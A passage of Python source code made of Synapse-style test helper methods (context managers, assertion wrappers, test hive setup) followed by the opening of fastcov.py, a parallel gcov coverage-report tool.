                                           'big badda boom happened') as stream:
                # Do something that triggers a log message
                await doSomething()
                # Wait for the mesg to be written to the stream
                await stream.wait(timeout=10)

            stream.seek(0)
            mesgs = stream.read()
            # Do something with messages

    Yields:
        AsyncStreamEvent: An AsyncStreamEvent object.
    '''
    stream = AsyncStreamEvent()
    stream.setMesg(mesg)
    handler = logging.StreamHandler(stream)
    slogger = logging.getLogger(logname)
    slogger.addHandler(handler)
    # Capture everything while attached; the previous level is restored on exit.
    level = slogger.level
    slogger.setLevel('DEBUG')
    # try/finally alone guarantees cleanup; the old ``except Exception: raise``
    # no-op re-raise was removed.
    try:
        yield stream
    finally:
        slogger.removeHandler(handler)
        slogger.setLevel(level)
@contextlib.asynccontextmanager
async def getHttpSess(self, auth=None, port=None):
    '''
    Get an aiohttp ClientSession with a CookieJar.

    Args:
        auth (str, str): A tuple of username and password information for http auth.
        port (int): Port number to connect to.

    Notes:
        If auth and port are provided, the session will login to a Synapse cell
        hosted at localhost:port.

    Returns:
        aiohttp.ClientSession: An aiohttp.ClientSession object.
    '''
    # unsafe=True allows cookies for bare-IP hosts such as 127.0.0.1;
    # ssl=False because test cells present self-signed certificates.
    jar = aiohttp.CookieJar(unsafe=True)
    conn = aiohttp.TCPConnector(ssl=False)

    async with aiohttp.ClientSession(cookie_jar=jar, connector=conn) as sess:

        if auth is not None:

            if port is None:  # pragma: no cover
                raise Exception('getHttpSess requires port for auth')

            user, passwd = auth
            async with sess.post(f'https://localhost:{port}/api/v1/login',
                                 json={'user': user, 'passwd': passwd}) as resp:
                retn = await resp.json()
                self.eq('ok', retn.get('status'))
                self.eq(user, retn['result']['name'])

        yield sess
@contextlib.contextmanager
def setTstEnvars(self, **props):
    '''
    Set environment variables for the purposes of running a specific test.

    Args:
        **props: A kwarg list of envars to set. The values set are run
                 through str() to ensure we're setting strings.

    Examples:
        Run a test while a envar is set::

            with self.setTstEnvars(magic='haha') as nop:
                ret = dostuff()
                self.true(ret)

    Notes:
        This helper explicitly sets and unsets values in os.environ, as
        os.putenv does not automatically update the os.environ object.

    Yields:
        None. This context manager yields None. Upon exiting, envars are
        either removed from os.environ or reset to their previous values.
    '''
    old_data = {}
    pop_data = set()
    for key, valu in props.items():
        v = str(valu)
        oldv = os.environ.get(key, None)
        # Explicit None check: an existing envar whose value is an empty
        # string must be restored on exit, not deleted (the old truthiness
        # test treated '' as "unset" and dropped it).
        if oldv is not None:
            if oldv == v:
                continue
            old_data[key] = oldv
        else:
            pop_data.add(key)
        os.environ[key] = v

    try:
        yield None
    finally:
        # Clean up any new envars we set and any old envars we need to reset.
        for key in pop_data:
            del os.environ[key]
        for key, valu in old_data.items():
            os.environ[key] = valu
async def execToolMain(self, func, argv):
    '''
    Run a synchronous tool main() in the executor and return (retn, outp).

    Args:
        func: Tool entry point accepting (argv, outp=...).
        argv (list): Argument vector for the tool.

    Returns:
        (int, TstOutPut): The tool return code and the captured output.
    '''
    outp = self.getTestOutp()

    def execmain():
        return func(argv, outp=outp)

    retn = await s_coro.executor(execmain)
    return retn, outp
@contextlib.contextmanager
def redirectStdin(self, new_stdin):
    '''
    Temporary replace stdin.

    Args:
        new_stdin(file-like object): file-like object.

    Examples:
        inp = io.StringIO('stdin stuff\nanother line\n')
        with self.redirectStdin(inp):
            main()

        Here's a way to use this for code that's expecting the stdin buffer to have bytes.
        inp = Mock()
        inp.buffer = io.BytesIO(b'input data')
        with self.redirectStdin(inp):
            main()

    Returns:
        None
    '''
    old_stdin = sys.stdin
    sys.stdin = new_stdin
    # try/finally so stdin is restored even when the managed block raises;
    # the original leaked the replacement stdin on exception.
    try:
        yield
    finally:
        sys.stdin = old_stdin
def genraises(self, exc, gfunc, *args, **kwargs):
    '''
    Helper to validate that a generator function will throw an exception.

    Args:
        exc: Exception class to catch
        gfunc: Generator function to call.
        *args: Args passed to the generator function.
        **kwargs: Kwargs passed to the generator function.

    Notes:
        Wraps the generator function in a ``list()`` call inside a bound
        local and executes it via ``self.raises(exc, boundlocal)``. The
        ``list()`` consumes the generator until it completes or raises.
    '''
    self.raises(exc, lambda: list(gfunc(*args, **kwargs)))
async def agenraises(self, exc, gfunc):
    '''
    Helper to validate that an async generator will throw an exception.

    Args:
        exc: Exception class to catch
        gfunc: async Generator
    '''
    # alist() consumes the async generator until completion or exception.
    await self.asyncraises(exc, alist(gfunc))

@contextlib.contextmanager
def setSynDir(self, dirn):
    '''
    Sets s_common.syndir to a specific directory and then unsets it afterwards.

    Args:
        dirn (str): Directory to set syndir to.

    Notes:
        This is to be used as a context manager.
    '''
    olddir = s_common.syndir
    try:
        s_common.syndir = dirn
        yield None
    finally:
        s_common.syndir = olddir
@contextlib.contextmanager
def getTestSynDir(self):
    '''
    Combines getTestDir() and setSynDir() into one.
    '''
    # Single with-statement: the temp dir becomes syndir for its lifetime.
    with self.getTestDir() as dirn, self.setSynDir(dirn):
        yield dirn
def eq(self, x, y, msg=None):
    '''
    Assert X is equal to Y
    '''
    # Exact-type check on purpose: only plain lists are coerced to tuples
    # so list/tuple comparisons succeed.
    if type(x) is list:
        x = tuple(x)
    if type(y) is list:
        y = tuple(y)
    self.assertEqual(x, y, msg=msg)
def eqish(self, x, y, places=6, msg=None):
    '''
    Assert X is equal to Y within places decimal places
    '''
    self.assertAlmostEqual(x, y, places, msg=msg)

def ne(self, x, y):
    '''
    Assert X is not equal to Y
    '''
    self.assertNotEqual(x, y)

def true(self, x, msg=None):
    '''
    Assert X is True
    '''
    self.assertTrue(x, msg=msg)

def false(self, x, msg=None):
    '''
    Assert X is False
    '''
    self.assertFalse(x, msg=msg)

def nn(self, x, msg=None):
    '''
    Assert X is not None
    '''
    self.assertIsNotNone(x, msg=msg)

def none(self, x, msg=None):
    '''
    Assert X is None
    '''
    self.assertIsNone(x, msg=msg)

def noprop(self, info, prop):
    '''
    Assert a property is not present in a dictionary.
    '''
    # The novalu sentinel distinguishes "missing" from "present but None".
    valu = info.get(prop, s_common.novalu)
    self.eq(valu, s_common.novalu)

def raises(self, *args, **kwargs):
    '''
    Assert a function raises an exception.
    '''
    return self.assertRaises(*args, **kwargs)

async def asyncraises(self, exc, coro):
    '''
    Assert an awaitable raises an exception.
    '''
    with self.assertRaises(exc):
        await coro

def sorteq(self, x, y, msg=None):
    '''
    Assert two sorted sequences are the same.
    '''
    return self.eq(sorted(x), sorted(y), msg=msg)

def isinstance(self, obj, cls, msg=None):
    '''
    Assert a object is the instance of a given class or tuple of classes.
    '''
    self.assertIsInstance(obj, cls, msg=msg)

def isin(self, member, container, msg=None):
    '''
    Assert a member is inside of a container.
    '''
    self.assertIn(member, container, msg=msg)

def notin(self, member, container, msg=None):
    '''
    Assert a member is not inside of a container.
    '''
    self.assertNotIn(member, container, msg=msg)

def gt(self, x, y, msg=None):
    '''
    Assert that X is greater than Y
    '''
    self.assertGreater(x, y, msg=msg)

def ge(self, x, y, msg=None):
    '''
    Assert that X is greater than or equal to Y
    '''
    self.assertGreaterEqual(x, y, msg=msg)

def lt(self, x, y, msg=None):
    '''
    Assert that X is less than Y
    '''
    self.assertLess(x, y, msg=msg)

def le(self, x, y, msg=None):
    '''
    Assert that X is less than or equal to Y
    '''
    self.assertLessEqual(x, y, msg=msg)
def len(self, x, obj, msg=None):
    '''
    Assert that the length of an object is equal to X

    Args:
        x (int): Expected length.
        obj: Object to measure. Generator-like objects are fully consumed
            into a list first, since they have no len().
        msg (str): Optional assertion message.
    '''
    gtyps = (
        s_coro.GenrHelp,
        s_telepath.Genr,
        s_telepath.GenrIter,
        types.GeneratorType)

    if isinstance(obj, gtyps):
        obj = list(obj)

    self.eq(x, len(obj), msg=msg)
async def agenlen(self, x, obj, msg=None):
    '''
    Assert that the async generator produces x items
    '''
    total = 0
    async for _item in obj:
        total += 1
    self.eq(x, total, msg=msg)
def stormIsInPrint(self, mesg, mesgs):
    '''
    Check if a string is present in all of the print messages from a stream of storm messages.

    Args:
        mesg (str): A string to check.
        mesgs (list): A list of storm messages.
    '''
    print_str = '\n'.join([m[1].get('mesg') for m in mesgs if m[0] == 'print'])
    self.isin(mesg, print_str)

def stormIsInWarn(self, mesg, mesgs):
    '''
    Check if a string is present in all of the warn messages from a stream of storm messages.

    Args:
        mesg (str): A string to check.
        mesgs (list): A list of storm messages.
    '''
    print_str = '\n'.join([m[1].get('mesg') for m in mesgs if m[0] == 'warn'])
    self.isin(mesg, print_str)

def stormIsInErr(self, mesg, mesgs):
    '''
    Check if a string is present in all of the error messages from a stream of storm messages.

    Args:
        mesg (str): A string to check.
        mesgs (list): A list of storm messages.
    '''
    # NOTE(review): err payloads are indexed m[1][1], i.e. the info dict of
    # an (errname, info) tuple - unlike print/warn which use m[1] directly.
    print_str = '\n'.join([m[1][1].get('mesg') for m in mesgs if m[0] == 'err'])
    self.isin(mesg, print_str)
def istufo(self, obj):
    '''
    Check to see if an object is a tufo.

    Args:
        obj (object): Object being inspected. This is validated to be a
        tuple of length two, containing a str or None as the first value,
        and a dict as the second value.

    Notes:
        This does not make any assumptions about the contents of the dictionary.

    Returns:
        None
    '''
    self.isinstance(obj, tuple)
    self.len(2, obj)
    self.isinstance(obj[0], (type(None), str))
    self.isinstance(obj[1], dict)

@contextlib.contextmanager
def getTestConfDir(self, name, conf=None):
    '''
    Get a temporary directory containing a cell directory ``name``,
    optionally pre-populated with a cell.yaml from ``conf``.
    '''
    with self.getTestDir() as dirn:
        cdir = os.path.join(dirn, name)
        s_common.makedirs(cdir)
        if conf:
            s_common.yamlsave(conf, cdir, 'cell.yaml')
        yield dirn

async def addCreatorDeleterRoles(self, core):
    '''
    Add two roles to a Cortex *proxy*, the `creator` and `deleter` roles.
    Creator allows for node:add, prop:set and tag:add actions.
    Deleter allows for node:del, prop:del and tag:del actions.

    Args:
        core: Auth enabled cortex.
    '''
    creator = await core.auth.addRole('creator')
    await creator.setRules((
        (True, ('node', 'add')),
        (True, ('node', 'prop', 'set')),
        (True, ('node', 'tag', 'add')),
        (True, ('feed:data',)),
    ))

    deleter = await core.auth.addRole('deleter')
    await deleter.setRules((
        (True, ('node', 'del')),
        (True, ('node', 'prop', 'del')),
        (True, ('node', 'tag', 'del')),
    ))

    # Two users, one granted each role, both with the password 'secret'.
    iadd = await core.auth.addUser('icanadd')
    await iadd.grant(creator.iden)
    await iadd.setPasswd('secret')

    idel = await core.auth.addUser('icandel')
    await idel.grant(deleter.iden)
    await idel.setPasswd('secret')
@contextlib.asynccontextmanager
async def getTestHive(self):
    '''
    Get a test SlabHive backed by a temporary directory.
    '''
    with self.getTestDir() as dirn:
        async with self.getTestHiveFromDirn(dirn) as hive:
            yield hive

@contextlib.asynccontextmanager
async def getTestHiveFromDirn(self, dirn):
    '''
    Get a test SlabHive backed by the given directory.
    '''
    import synapse.lib.const as s_const
    map_size = s_const.gibibyte

    async with await s_lmdbslab.Slab.anit(dirn, map_size=map_size) as slab:
        nexsroot = await s_nexus.NexsRoot.anit(dirn)
        await nexsroot.startup(None)
        async with await s_hive.SlabHive.anit(slab, nexsroot=nexsroot) as hive:
            # Tear down the nexus root when the hive is finished.
            hive.onfini(nexsroot.fini)
            yield hive

@contextlib.asynccontextmanager
async def getTestHiveDmon(self):
    '''
    Get a test daemon with a test hive shared on it as 'hive'.
    '''
    with self.getTestDir() as dirn:
        async with self.getTestHiveFromDirn(dirn) as hive:
            async with self.getTestDmon() as dmon:
                dmon.share('hive', hive)
                yield dmon

@contextlib.asynccontextmanager
async def getTestTeleHive(self):
    '''
    Get a telepath proxy to a test hive shared on a test daemon.
    '''
    async with self.getTestHiveDmon() as dmon:
        turl = self.getTestUrl(dmon, 'hive')
        async with await s_hive.openurl(turl) as hive:
            yield hive
def stablebuid(self, valu=None):
    '''
    A stable buid generation for testing purposes
    '''
    if valu is not None:
        # Deterministic: hash the msgpack encoding of the value.
        return hashlib.sha256(s_msgpack.en(valu)).digest()

    # No value given: hand out the next sequential 32-byte buid.
    retn = self._NextBuid.to_bytes(32, 'big')
    self._NextBuid += 1
    return retn
def stableguid(self, valu=None):
    '''
    A stable guid generation for testing purposes
    '''
    if valu is not None:
        # Deterministic: hash the msgpack encoding of the value.
        return hashlib.md5(s_msgpack.en(valu)).hexdigest()

    # No value given: hand out the next sequential 16-byte guid.
    retn = s_common.ehex(self._NextGuid.to_bytes(16, 'big'))
    self._NextGuid += 1
    return retn
@contextlib.contextmanager
def withStableUids(self):
    '''
    A context manager that generates guids and buids in sequence so that successive test runs use the same
    data
    '''
    with mock.patch('synapse.common.guid', self.stableguid), mock.patch('synapse.common.buid', self.stablebuid):
        yield

async def runCoreNodes(self, core, query, opts=None):
    '''
    Run a storm query through a Cortex as a SchedCoro and return the results.

    Args:
        core: Cortex to execute the query on.
        query (str): Storm query text.
        opts (dict): Optional storm options.
    '''
    async def coro():
        return await core.nodes(query, opts)
    return await core.schedCoro(coro())
|
fastcov.py | #!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright 2018-present, Bryan Gillespie
"""
Author: Bryan Gillespie
https://github.com/RPGillespie6/fastcov
A massively parallel gcov wrapper for generating intermediate coverage formats fast
The goal of fastcov is to generate code coverage intermediate formats as fast as possible,
even for large projects with hundreds of gcda objects. The intermediate formats may then be
consumed by a report generator such as lcov's genhtml, or a dedicated frontend such as coveralls.
Sample Usage:
$ cd build_dir
$ ./fastcov.py --zerocounters
$ <run unit tests>
$ ./fastcov.py --exclude /usr/include test/ --lcov -o report.info
$ genhtml -o code_coverage report.info
"""
import re
import os
import sys
import glob
import json
import time
import fnmatch
import logging
import argparse
import threading
import subprocess
import multiprocessing
# Tool version and minimum supported tool versions.
FASTCOV_VERSION = (1,14)
MINIMUM_PYTHON = (3,5)
MINIMUM_GCOV = (9,0,0)

# Interesting metrics (updated as gcov output is processed).
START_TIME = time.monotonic()
GCOVS_TOTAL = 0
GCOVS_SKIPPED = 0

# Gcov Coverage File Extensions
GCOV_GCNO_EXT = ".gcno" # gcno = "[gc]ov [no]te"
GCOV_GCDA_EXT = ".gcda" # gcda = "[gc]ov [da]ta"

# For when things go wrong...
# Start error codes at 3 because 1-2 are special
# See https://stackoverflow.com/a/1535733/2516916
EXIT_CODE = 0
EXIT_CODES = {
    "gcov_version": 3,
    "python_version": 4,
    "unsupported_coverage_format": 5,
    "excl_not_found": 6,
    "bad_chunk_file": 7,
    "missing_json_key": 8,
}

# Disable all logging in case developers are using this as a module
logging.disable(level=logging.CRITICAL)
class FastcovFormatter(logging.Formatter):
    """Log formatter that lowercases level names and prefixes elapsed time."""

    def format(self, record):
        record.levelname = record.levelname.lower()
        formatted = super().format(record)
        return "[{:.3f}s] {}".format(stopwatch(), formatted)
class DiffParseError(Exception):
    """Raised when a unified diff file cannot be parsed."""
    pass
class DiffParser(object):
    """Parse a unified diff into {target_path: set(added_line_numbers)} metadata
    and filter a fastcov report down to the lines that diff touches."""

    def _refinePaths(self, diff_metadata, diff_base_dir):
        # Drop placeholder targets: '/dev/null' (deletions) and '' (malformed headers).
        diff_metadata.pop('/dev/null', None)
        diff_metadata.pop('', None)

        # Rewrite keys as base-dir-joined or absolute paths.
        for key, value in diff_metadata.copy().items():
            diff_metadata.pop(key)
            #sources without added lines will be excluded
            if value:
                newpath = os.path.join(diff_base_dir, key) if diff_base_dir else os.path.abspath(key)
                diff_metadata[newpath] = value

    def _parseTargetFile(self, line_with_target_file):
        # Return the target filename from a '+++ ' header line.
        #f.e. '+++ b/README.md1' or '+++ b/README.md1 timestamp'
        target_source = line_with_target_file[4:].partition('\t')[0].strip()
        target_source = target_source[2:] if target_source.startswith('b/') else target_source
        return target_source

    def _parseHunkBoundaries(self, line_with_hunk_boundaries, line_index):
        # Parse an '@@' hunk header into start/count pairs for target and source.
        # Raises DiffParseError if the header is malformed.
        #f.e. '@@ -121,4 +122,4 @@ Time to process all gcda and parse all gcov:'
        # Here ['-121,4', '+122,4']
        lines_info = line_with_hunk_boundaries[3:].partition("@@")[0].strip().split(' ')
        if len(lines_info) != 2:
            raise DiffParseError("Found invalid hunk. Line #{}. {}".format(line_index, line_with_hunk_boundaries))
        # Here ['122','4']
        target_lines_info = lines_info[1].strip('+').partition(',')
        target_line_current = int(target_lines_info[0])
        # A missing count (no comma) means a single-line hunk.
        target_lines_count = int(target_lines_info[2]) if target_lines_info[2] else 1
        # Here ['121','4']
        source_lines_info = lines_info[0].strip('-').partition(',')
        source_line_current = int(source_lines_info[0])
        source_lines_count = int(source_lines_info[2]) if source_lines_info[2] else 1
        return target_line_current, target_lines_count, source_line_current, source_lines_count

    def parseDiffFile(self, diff_file, diff_base_dir, fallback_encodings=[]):
        # NOTE(review): mutable default arg; it is only passed through to
        # getSourceLines, so it is harmless here, but a None default would
        # be cleaner if getSourceLines tolerates it - confirm before changing.
        #
        # Walks the diff line by line, tracking hunk boundary counters for
        # both sides; added target line numbers are collected per file.
        diff_metadata = {}
        target_source = None
        target_hunk = set()
        target_line_current = 0
        target_line_end = 0
        source_line_current = 0
        source_line_end = 0
        found_hunk = False
        for i, line in enumerate(getSourceLines(diff_file, fallback_encodings), 1):
            line = line.rstrip()
            if not found_hunk:
                if line.startswith('+++ '):
                    # refresh file
                    target_source = self._parseTargetFile(line)
                elif line.startswith('@@ '):
                    # refresh hunk
                    target_line_current, target_lines_count, source_line_current, source_lines_count = self._parseHunkBoundaries(line, i)
                    target_line_end = target_line_current + target_lines_count
                    source_line_end = source_line_current + source_lines_count
                    target_hunk = set()
                    found_hunk = True
                continue

            if target_line_current > target_line_end or source_line_current > source_line_end:
                raise DiffParseError("Hunk longer than expected. Line #{}. {}".format(i, line))

            if line.startswith('+'):
                #line related to target
                target_hunk.add(target_line_current)
                target_line_current = target_line_current + 1
            elif line.startswith(' ') or line == '':
                # line related to both
                target_line_current = target_line_current + 1
                source_line_current = source_line_current + 1
            elif line.startswith('-'):
                # line related to source
                source_line_current = source_line_current + 1
            elif not line.startswith('\\'): # No newline at end of file
                # line with newline marker is not included into any boundaries
                raise DiffParseError("Found unrecognized hunk line type. Line #{}. {}".format(i, line))

            if target_line_current == target_line_end and source_line_current == source_line_end:
                # Checked all lines, save data
                if target_source in diff_metadata:
                    diff_metadata[target_source] = target_hunk.union(diff_metadata[target_source])
                else:
                    diff_metadata[target_source] = target_hunk
                target_hunk = set()
                found_hunk = False

        if target_line_current != target_line_end or source_line_current != source_line_end:
            raise DiffParseError("Unexpected end of file. Expected hunk with {} target lines, {} source lines".format(
                target_line_end - target_line_current, source_line_end - source_line_current))

        self._refinePaths(diff_metadata, diff_base_dir)
        return diff_metadata

    def filterByDiff(self, diff_file, dir_base_dir, fastcov_json, fallback_encodings=[]):
        # Remove from fastcov_json every source file, line, and branch that
        # the diff does not add/modify; returns the filtered report.
        diff_metadata = self.parseDiffFile(diff_file, dir_base_dir, fallback_encodings)
        logging.debug("Include only next files: {}".format(diff_metadata.keys()))
        excluded_files_count = 0
        excluded_lines_count = 0
        for source in list(fastcov_json["sources"].keys()):
            diff_lines = diff_metadata.get(source, None)
            if not diff_lines:
                excluded_files_count = excluded_files_count + 1
                logging.debug("Exclude {} according to diff file".format(source))
                fastcov_json["sources"].pop(source)
                continue
            for test_name, report_data in fastcov_json["sources"][source].copy().items():
                #No info about functions boundaries, removing all
                for function in list(report_data["functions"].keys()):
                    report_data["functions"].pop(function, None)

                for line in list(report_data["lines"].keys()):
                    if line not in diff_lines:
                        excluded_lines_count = excluded_lines_count + 1
                        report_data["lines"].pop(line)

                for branch_line in list(report_data["branches"].keys()):
                    if branch_line not in diff_lines:
                        report_data["branches"].pop(branch_line)

                if len(report_data["lines"]) == 0:
                    fastcov_json["sources"][source].pop(test_name)

            if len(fastcov_json["sources"][source]) == 0:
                excluded_files_count = excluded_files_count + 1
                logging.debug('Exclude {} file as it has no lines due to diff filter'.format(source))
                fastcov_json["sources"].pop(source)

        logging.info("Excluded {} files and {} lines according to diff file".format(excluded_files_count, excluded_lines_count))
        return fastcov_json
def chunks(l, n):
    """Yield successive n-sized chunks from l (the final chunk may be shorter)."""
    for offset in range(0, len(l), n):
        yield l[offset:offset + n]
def setExitCode(key):
    """Record the process exit code named by *key* in the EXIT_CODES table."""
    global EXIT_CODE
    EXIT_CODE = EXIT_CODES[key]

def setExitCodeRaw(code):
    """Record *code* directly as the process exit code."""
    global EXIT_CODE
    EXIT_CODE = code

def incrementCounters(total, skipped):
    """Accumulate per-worker gcov totals into the module-level counters."""
    global GCOVS_TOTAL
    global GCOVS_SKIPPED
    GCOVS_TOTAL += total
    GCOVS_SKIPPED += skipped

def stopwatch():
    """Return number of seconds since last time this was called."""
    global START_TIME
    end_time = time.monotonic()
    delta = end_time - START_TIME
    START_TIME = end_time
    return delta
def parseVersionFromLine(version_str):
    """Given a string containing a dotted integer version, parse out integers and return as tuple.

    Returns (0, 0, 0) when no x.y.z version is present.
    """
    match = re.search(r'(\d+\.\d+\.\d+)', version_str)
    if match is None:
        return (0, 0, 0)
    major, minor, patch = match.group(1).split(".")
    return (int(major), int(minor), int(patch))
def getGcovVersion(gcov):
    """Run ``gcov -v`` and parse the (major, minor, patch) version tuple
    from the first line of its output."""
    p = subprocess.Popen([gcov, "-v"], stdout=subprocess.PIPE)
    output = p.communicate()[0].decode('UTF-8')
    p.wait()
    return parseVersionFromLine(output.split("\n")[0])
def removeFiles(files):
    """Delete every path in *files* from disk."""
    for path in files:
        os.remove(path)
def getFilteredCoverageFiles(coverage_files, exclude):
    """Return coverage_files minus any path containing an --exclude-gcda substring."""
    kept = []
    for gcda in coverage_files:
        # First matching exclude pattern wins; log why the file was dropped.
        matched = next((ex for ex in exclude if ex in gcda), None)
        if matched is None:
            kept.append(gcda)
        else:
            logging.debug("Omitting %s due to '--exclude-gcda %s'", gcda, matched)
    return kept
def globCoverageFiles(cwd, coverage_type):
    """Recursively glob under *cwd* for files with the given extension."""
    return glob.glob(os.path.join(os.path.abspath(cwd), "**/*" + coverage_type), recursive=True)

def findCoverageFiles(cwd, coverage_files, use_gcno):
    """Return the coverage files to process: the user-provided list, or a
    recursive glob for .gcno/.gcda files under *cwd* when none were given."""
    coverage_type = "user provided"
    if not coverage_files:
        # gcov strips off extension of whatever you pass it and searches [extensionless name] + .gcno/.gcda
        # We should pass either gcno or gcda, but not both - if you pass both it will be processed twice
        coverage_type = GCOV_GCNO_EXT if use_gcno else GCOV_GCDA_EXT
        coverage_files = globCoverageFiles(cwd, coverage_type)

    logging.info("Found {} coverage files ({})".format(len(coverage_files), coverage_type))
    logging.debug("Coverage files found:\n    %s", "\n    ".join(coverage_files))
    return coverage_files
def gcovWorker(data_q, metrics_q, args, chunk, gcov_filter_options):
    """Worker process: run gcov over *chunk* and stream its JSON intermediate
    output into a partial fastcov report.

    Args:
        data_q (multiprocessing.Queue): Receives this worker's partial report.
        metrics_q (multiprocessing.Queue): Receives a (total, skipped) tuple.
        args: Parsed CLI arguments.
        chunk (list): Coverage files for this worker.
        gcov_filter_options (dict): Source filtering options.

    Exits the process with the accumulated EXIT_CODE so the parent can
    propagate failures.
    """
    base_report = {"sources": {}}
    gcovs_total = 0
    gcovs_skipped = 0
    error_exit = False  # NOTE(review): unused in this function - confirm before removing.

    gcov_bin = args.gcov
    gcov_args = ["--json-format", "--stdout"]
    if args.branchcoverage or args.xbranchcoverage:
        gcov_args.append("--branch-probabilities")

    encoding = sys.stdout.encoding if sys.stdout.encoding else 'UTF-8'
    workdir = args.cdirectory if args.cdirectory else "."
    p = subprocess.Popen([gcov_bin] + gcov_args + chunk, cwd=workdir, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)

    # gcov emits one JSON document per line, one per input coverage file.
    for i, line in enumerate(iter(p.stdout.readline, b'')):
        try:
            intermediate_json = json.loads(line.decode(encoding))
        except json.decoder.JSONDecodeError as e:
            logging.error("Could not process chunk file '{}' ({}/{})".format(chunk[i], i+1, len(chunk)))
            logging.error(str(e))
            setExitCode("bad_chunk_file")
            continue

        if "current_working_directory" not in intermediate_json:
            logging.error("Missing 'current_working_directory' for data file: {}".format(intermediate_json))
            setExitCode("missing_json_key")
            continue

        intermediate_json_files = processGcovs(args.cdirectory, intermediate_json["files"], intermediate_json["current_working_directory"], gcov_filter_options)
        for f in intermediate_json_files:
            distillSource(f, base_report["sources"], args.test_name, args.xbranchcoverage)
        gcovs_total += len(intermediate_json["files"])
        gcovs_skipped += len(intermediate_json["files"]) - len(intermediate_json_files)

    p.wait()
    data_q.put(base_report)
    metrics_q.put((gcovs_total, gcovs_skipped))
    sys.exit(EXIT_CODE)
def processGcdas(args, coverage_files, gcov_filter_options):
    """Fan gcov work out across worker processes and merge their partial reports."""
    # Each worker gets at least args.minimum_chunk files; +1 rounds the division up.
    chunk_size = max(args.minimum_chunk, int(len(coverage_files) / args.jobs) + 1)
    processes = []
    data_q = multiprocessing.Queue()
    metrics_q = multiprocessing.Queue()
    for chunk in chunks(coverage_files, chunk_size):
        p = multiprocessing.Process(target=gcovWorker, args=(data_q, metrics_q, args, chunk, gcov_filter_options))
        processes.append(p)
        p.start()
    logging.info("Spawned {} gcov processes, each processing at most {} coverage files".format(len(processes), chunk_size))
    fastcov_jsons = []
    # Drain the queues before join()ing: a child using a Queue may not exit
    # until its queued data has been consumed.
    for p in processes:
        fastcov_jsons.append(data_q.get())
        incrementCounters(*metrics_q.get())
    for p in processes:
        p.join()
        if p.exitcode != 0:
            setExitCodeRaw(p.exitcode)
    # Use one worker's report as the base and fold the others into it.
    base_fastcov = fastcov_jsons.pop()
    for fj in fastcov_jsons:
        combineReports(base_fastcov, fj)
    return base_fastcov
def shouldFilterSource(source, gcov_filter_options):
    """Returns true if the provided source file should be filtered due to CLI options, otherwise returns false."""
    # If explicit sources were passed, check for match
    explicit_sources = gcov_filter_options["sources"]
    if explicit_sources and source not in explicit_sources:
        logging.debug("Filtering coverage for '%s' due to option '--source-files'", source)
        return True

    # Check exclude filter (plain substring matches)
    for substring in gcov_filter_options["exclude"]:
        if substring in source:
            logging.debug("Filtering coverage for '%s' due to option '--exclude %s'", source, substring)
            return True

    # Check exclude filter (glob patterns)
    for pattern in gcov_filter_options["exclude_glob"]:
        if fnmatch.fnmatch(source, pattern):
            logging.debug("Filtering coverage for '%s' due to option '--exclude-glob %s'", source, pattern)
            return True

    # Check include filter - at least one substring must match if any were given
    includes = gcov_filter_options["include"]
    if includes and not any(substring in source for substring in includes):
        logging.debug("Filtering coverage for '%s' due to option '--include %s'", source, " ".join(includes))
        return True

    return False
def filterFastcov(fastcov_json, args):
    """Drop report sources that match the user's post-processing filter options."""
    logging.info("Performing filtering operations (if applicable)")
    filter_opts = getGcovFilterOptions(args)
    sources = fastcov_json["sources"]
    # Collect first, then delete - never mutate a dict while iterating it.
    doomed = [path for path in sources if shouldFilterSource(path, filter_opts)]
    for path in doomed:
        del sources[path]
def processGcov(cwd, gcov, source_base_dir, files, gcov_filter_options):
    """Attach an absolute path to a raw gcov record and append it to `files` unless filtered."""
    # Uses cwd if set, else source_base_dir from gcov json. If both are empty, uses "."
    base_dir = cwd or source_base_dir or "."
    # Add absolute path
    gcov["file_abs"] = os.path.abspath(os.path.join(base_dir, gcov["file"]))
    if shouldFilterSource(gcov["file_abs"], gcov_filter_options):
        return
    files.append(gcov)
    logging.debug("Accepted coverage for '%s'", gcov["file_abs"])
def processGcovs(cwd, gcov_files, source_base_dir, gcov_filter_options):
    """Run every raw gcov record through processGcov and return the accepted ones."""
    accepted = []
    for record in gcov_files:
        processGcov(cwd, record, source_base_dir, accepted, gcov_filter_options)
    return accepted
def dumpBranchCoverageToLcovInfo(f, branches):
    """Write BRDA/BRF/BRH branch records for one source file to an lcov info stream."""
    records = []
    total = 0
    hits = 0
    for line_num, branch_counts in branches.items():
        for branch_index, taken in enumerate(branch_counts):
            # Branch (<line number>, <block number>, <branch number>, <taken>)
            records.append((line_num, branch_index // 2, branch_index, taken))
            total += 1
            if taken != 0:
                hits += 1
    for record in sorted(records):
        f.write("BRDA:{},{},{},{}\n".format(*record))
    f.write("BRF:{}\n".format(total)) # Branches Found
    f.write("BRH:{}\n".format(hits)) # Branches Hit
def dumpToLcovInfo(fastcov_json, output):
    """Write the fastcov report to `output` in lcov tracefile (.info) format.

    One TN/SF record group is emitted per (source file, test name) pair, each
    terminated by `end_of_record`.
    """
    with open(output, "w") as f:
        sources = fastcov_json["sources"]
        for sf in sorted(sources.keys()):
            for tn in sorted(sources[sf].keys()):
                data = sources[sf][tn]
                f.write("TN:{}\n".format(tn)) #Test Name - used mainly in conjuction with genhtml --show-details
                f.write("SF:{}\n".format(sf)) #Source File
                fn_miss = 0
                fn = []
                fnda = []
                for function, fdata in data["functions"].items():
                    fn.append((fdata["start_line"], function)) # Function Start Line
                    fnda.append((fdata["execution_count"], function)) # Function Hits
                    fn_miss += int(fdata["execution_count"] == 0)
                # NOTE: lcov sorts FN, but not FNDA.
                for v in sorted(fn):
                    f.write("FN:{},{}\n".format(*v))
                for v in sorted(fnda):
                    f.write("FNDA:{},{}\n".format(*v))
                f.write("FNF:{}\n".format(len(data["functions"]))) #Functions Found
                f.write("FNH:{}\n".format((len(data["functions"]) - fn_miss))) #Functions Hit
                if data["branches"]:
                    dumpBranchCoverageToLcovInfo(f, data["branches"])
                line_miss = 0
                da = []
                for line_num, count in data["lines"].items():
                    da.append((line_num, count))
                    line_miss += int(count == 0)
                for v in sorted(da):
                    f.write("DA:{},{}\n".format(*v)) # Line
                f.write("LF:{}\n".format(len(data["lines"]))) #Lines Found
                f.write("LH:{}\n".format((len(data["lines"]) - line_miss))) #Lines Hit
                f.write("end_of_record\n")
def getSourceLines(source, fallback_encodings=None):
    """Return a list of lines from the provided source, trying to decode with fallback encodings if the default fails.

    Args:
        source: path of the source file to read.
        fallback_encodings: optional list of encodings to try after the
